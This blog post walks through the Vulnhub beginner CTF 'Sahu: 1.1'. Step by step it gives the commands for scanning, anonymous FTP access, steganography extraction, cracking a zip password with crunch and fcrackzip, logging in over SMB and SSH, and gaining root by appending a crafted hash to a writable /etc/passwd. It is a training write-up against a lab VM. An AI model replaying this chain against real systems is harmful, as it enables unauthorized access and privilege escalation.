sahu: 1.1 Walkthrough Vulnhub

sahu: 1.1 Walkthrough Vulnhub CTF

Sahu: 1.1 is another CTF challenge given by vulnhub and the level difficultly is set according to beginners. and this is a boot to root challenge. you can download here

According to the author

Sahu is a Virtualbox VM Built on Ubuntu 64 bit, The Goal Of this Machine is to get root And Read the root.txt file with Some Good Enumeration Skills

Network Scanning

First We Scanning our local network with netdiscover

netdiscover
sahu: 1.1  Walkthrough

The next step is scanning the host IP to identify open ports and running services. twith Nmap aggressive scan

nmap -A -p- 192.168.1.35
sahu: 1.1  Walkthrough
Enumeration

we found our target port is open 21 FTP, 22 SSH, 80 HTTP, 139,445 smb samba server and we see the Nmap scan ftp port allows anonymous user login

  • username: ftp
  • password: ftp
ftp 192.168.1.35
ls
get ftp.zip

After login with ftp, I found a ftp.zip but the file is password protected

sahu: 1.1  Walkthrough

When you will explore machine IP in the web browser, we will see a Haryana State map

http://192.168.1.35
sahu: 1.1  Walkthrough

downloading the Haryana jpg file

wget http://192.168.1.34/Haryana-1-1.jpg
sahu: 1.1  Walkthrough

Basic directory Scanning with dirb

dirb http://192.168.1.34

I didn’t see anything I move on reading the source code and I found a paragraph line try to extract with hurry

http//192.168.1.35/H/A/R/Y/A/N/A

extracting data Haryana image file using password hurry

steghide extract -sf Haryana-1-1.jpg

After extracting the file I found a new file file.txt and we see author massage hint I have forgotten the last two part of it can you find out 5AHU**

cat file.txt
sahu: 1.1  Walkthrough

I created many dictionaries with a crunch but finally, I found correct wordlist

crunch 6 6 -t 5AH^% >wordlist.txt

cracking the zip file fcrackzip kali Linux toll dictionary mode (-D ) ( -p parameter our wordlist) and our ftp.zip file name

fcrackzip -D -p wordlist.txt ftp.zip

and we found a possible password: 5AHU#5

unzip ftp.zip
cat ftp.txt
sahu: 1.1  Walkthrough

I try to log in with ftp.txt file credential and again we found another ssh.txt file get command to download the file our local system

smbclient //192.168.1.35/sambashare -U sahu -p

get ssh.txt
cat ssh.txt
sahu: 1.1  Walkthrough
  • username: haryana
  • password: hralltime

login with ssh connection

ssh haryana@192.168.1.35
id
sahu: 1.1  Walkthrough
Privilege Escalation

Enumeration time I round target system /etc/passwd file writeable all user edit this file

ls -lsa /etc/passwd

Generating a New MD5 salted hash

openssl passwd -1 -salt rahul hackNos
sahu: 1.1  Walkthrough

Adding our user /etc/passwd file using nano editor

nano /etc/passwd

After adding new user target passwd I run ( su switch user command) hacknos and we see our shell is change normal user to root user

su hacknos

Finally, we found our root Flag !!!!

cd /root
ls 
cat root.txt
Sar: 1 Walkthrough Vulnhub CTF read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *